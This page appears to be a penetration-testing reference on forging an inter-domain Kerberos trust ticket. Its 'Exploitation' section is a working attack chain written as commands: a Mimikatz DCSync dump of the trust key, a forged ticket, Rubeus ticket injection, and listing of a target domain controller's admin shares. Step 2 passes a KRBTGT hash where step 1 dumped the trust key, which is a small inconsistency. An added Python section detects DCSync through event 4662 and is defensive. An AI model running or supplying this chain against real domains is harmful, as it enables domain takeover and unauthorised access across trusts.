
# Forge Trust Ticket

> The domain Kerberos service account is used to sign and encrypt every authentication ticket (TGT). This enables the TGT to be used throughout the domain and presented to any DC in the domain. This works since the Kerberos service account ([KRBTGT](https://adsecurity.org/?p=483)) is effectively the trust anchor used for the domain and is why losing control of the KRBTGT account password hash equates to losing control of the domain.

### Exploitation

1. The first step is to retrieve the trust key. This is done by dumping it from the domain controller with Mimikatz:

```bash
# Dumping the trust key with Mimikatz
lsadump::dcsync /user:$domain$
```

2. We can then create the trust ticket, also using Mimikatz:

```bash
kerberos::golden /domain:$domain /sid:$domainsid /rc4:$krbtgthash /user:Administrator /service:krbtgt /target:$targetdomain /ticket:trust.kirbi
```

3. After saving the ticket to a file, we can use it to request a TGS for the targeted service with Rubeus.exe, which in this case is CIFS in the target domain:

```bash
.\Rubeus.exe asktgs /ticket:trust.kirbi /service:cifs/$targetdomain /ptt /dc:$targetdc
```

4. Because we passed the `/ptt` argument to Rubeus, the ticket has already been injected into memory, and we should now be able to access the target domain controller. A trivial way to verify that this was successful is to list the contents of the target domain controller:

```bash
# Confirm access with net use
net use \\$targetdc\admin$

# List the contents of the target domain controller
dir \\$targetdc\admin$
dir \\$targetdc\c$
```
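
On the defensive side, step 1 is the most visible part of this chain: DCSync is a directory replication request, and a domain controller records it as Security event 4662 when directory service access auditing is enabled on the domain object. The following is an added example, not part of the original page, that flags such requests from principals that are not known domain controllers; the JSON-lines export format, the `find_dcsync` name and the sample events are assumptions constructed for illustration.

```python
# Added example (not from the original page): flag DCSync-style replication
# requests in Windows Security event 4662 records exported as JSON lines.
import json

# Control-access right GUIDs for directory replication (AD schema values).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

def find_dcsync(lines, known_dcs):
    """Return alerts for 4662 events where a non-allowlisted principal used replication rights."""
    allowed = {name.lower() for name in known_dcs}
    alerts = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed export lines instead of aborting the scan
        if str(ev.get("EventID")) != "4662":
            continue
        props = str(ev.get("Properties", "")).lower()
        rights = sorted(name for guid, name in REPLICATION_RIGHTS.items() if guid in props)
        subject = str(ev.get("SubjectUserName", ""))
        if rights and subject.lower() not in allowed:
            alerts.append({"subject": subject,
                           "domain": ev.get("SubjectDomainName"),
                           "rights": rights})
    return alerts

# Constructed sample events: field names follow event 4662, values are made up.
SAMPLE = [
    '{"EventID": 4662, "SubjectUserName": "DC01$", "SubjectDomainName": "CORP", "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}"}',
    '{"EventID": 4662, "SubjectUserName": "jdoe", "SubjectDomainName": "CORP", "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"}',
    '{"EventID": 4662, "SubjectUserName": "svc_backup", "SubjectDomainName": "CORP", "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"}',
    '{"EventID": 4624, "SubjectUserName": "jdoe"}',
]

if __name__ == "__main__":
    for alert in find_dcsync(SAMPLE, known_dcs=["DC01$"]):
        print(alert)
```

The `known_dcs` allowlist should also contain any account that replicates legitimately, such as a directory synchronization service account; otherwise it will be flagged on every sync cycle.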

### References

- <https://adsecurity.org/?p=1588>

